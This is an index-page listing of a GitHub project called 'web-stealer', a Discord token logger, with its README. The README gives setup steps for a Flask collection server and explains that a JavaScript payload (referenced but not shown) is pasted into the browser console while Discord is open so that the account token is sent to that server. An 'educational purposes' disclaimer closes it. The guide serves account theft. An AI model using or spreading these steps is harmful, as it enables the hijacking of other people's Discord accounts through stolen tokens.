Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/baum1810/web-stealer

javascript discord token logger (web)
https://github.com/baum1810/web-stealer

baum1810 flask grabber js python token token-graber web-grabber web-grabbing

Last synced: 29 days ago
JSON representation

javascript discord token logger (web)

Awesome Lists containing this project

README

        

# Web-Stealer Setup Guide

## Platforms

This tool is compatible with Windows, macOS, Linux, and any other operating systems that support Python and Flask.

## Setup Instructions

1. **Clone the Repository**:
```
git clone https://github.com/osintcats/web-stealer.git
```

2. **Navigate to the Project Directory**:
```
cd web-stealer
```

3. **Install Required Python Packages**:
Ensure you have Python and pip installed. Create a `requirements.txt` file with the required dependencies and install them:
```
pip install -r requirements.txt
```

4. **Run the Flask Application**:
```
python api.py
```

## Payload JavaScript Snippet

To send the token to your server, use the following JavaScript snippet. Replace `'PASTE_URL_HERE'` with the URL of your Flask application. Copy the generated payload and paste it into the browser console while Discord is open. The token will be sent to your server.

## Credz
fixes by [baum1810](https://github.com/baum1810)

# Disclaimer
This program is intended solely for educational purposes to highlight potential security vulnerabilities. Do not use this program for unauthorized access or token grabbing. The creator assumes no responsibility for any damage or misuse resulting from the use of this software.